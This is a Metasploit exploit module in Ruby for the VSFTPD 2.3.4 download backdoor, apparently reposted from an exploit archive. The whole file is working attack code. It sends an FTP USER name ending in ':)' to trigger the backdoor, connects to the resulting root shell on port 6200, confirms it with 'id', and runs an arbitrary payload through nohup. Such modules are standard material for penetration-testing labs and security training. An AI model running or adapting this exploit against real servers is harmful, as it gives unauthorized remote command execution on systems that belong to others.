VSFTPD 2.3.4 Backdoor Command Execution

`##  
# $Id: vsftpd_234_backdoor.rb 13093 2011-07-04 20:09:32Z hdm $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',  
'Description' => %q{  
This module exploits a malicious backdoor that was added to the  
VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz  
archive sometime before July 3rd 2011.  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 13093 $',  
'References' =>  
[  
[ 'URL', 'http://pastebin.com/AetT9sS5'],  
[ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],  
],  
'Privileged' => true,  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 2000,  
'BadChars' => '',  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find'  
}  
},  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DisclosureDate' => 'Jul 3 2011',  
'DefaultTarget' => 0))  
  
register_options([ Opt::RPORT(21) ], self.class)  
deregister_options('FTPUSER', 'FTPPASS')  
end  
  
def exploit  
  
nsock = self.connect(false, {'RPORT' => 6200}) rescue nil  
if nsock  
print_status("The port used by the backdoor bind listener is already open")  
handle_backdoor(nsock)  
return  
end  
  
# Connect to the FTP service port first  
connect  
  
banner = sock.get_once(-1, 30).to_s  
print_status("Banner: #{banner.strip}")  
  
sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")  
resp = sock.get_once(-1, 30).to_s  
print_status("USER: #{resp.strip}")  
  
if resp =~ /^530 /  
print_error("This server is configured for anonymous only and the backdoor code cannot be reached")  
disconnect  
return  
end  
  
if resp !~ /^331 /  
print_error("This server did not response as expected: #{resp.strip}")  
disconnect  
return  
end  
  
sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")  
  
# Do not bother reading the response from password, just try the backdoor  
  
nsock = self.connect(false, {'RPORT' => 6200}) rescue nil  
if nsock  
print_good("Backdoor service has been spawned, handling...")  
handle_backdoor(nsock)  
return  
end  
  
disconnect  
  
end  
  
def handle_backdoor(s)  
  
s.put("id\n")  
  
r = s.get_once(-1, 5).to_s  
if r !~ /uid=/  
print_error("The service on port 6200 does not appear to be a shell")  
disconnect(s)  
end  
  
print_good("UID: #{r.strip}")  
  
s.put("nohup " + payload.encoded + " >/dev/null 2>&1")  
handler(s)  
end  
  
end  
  
`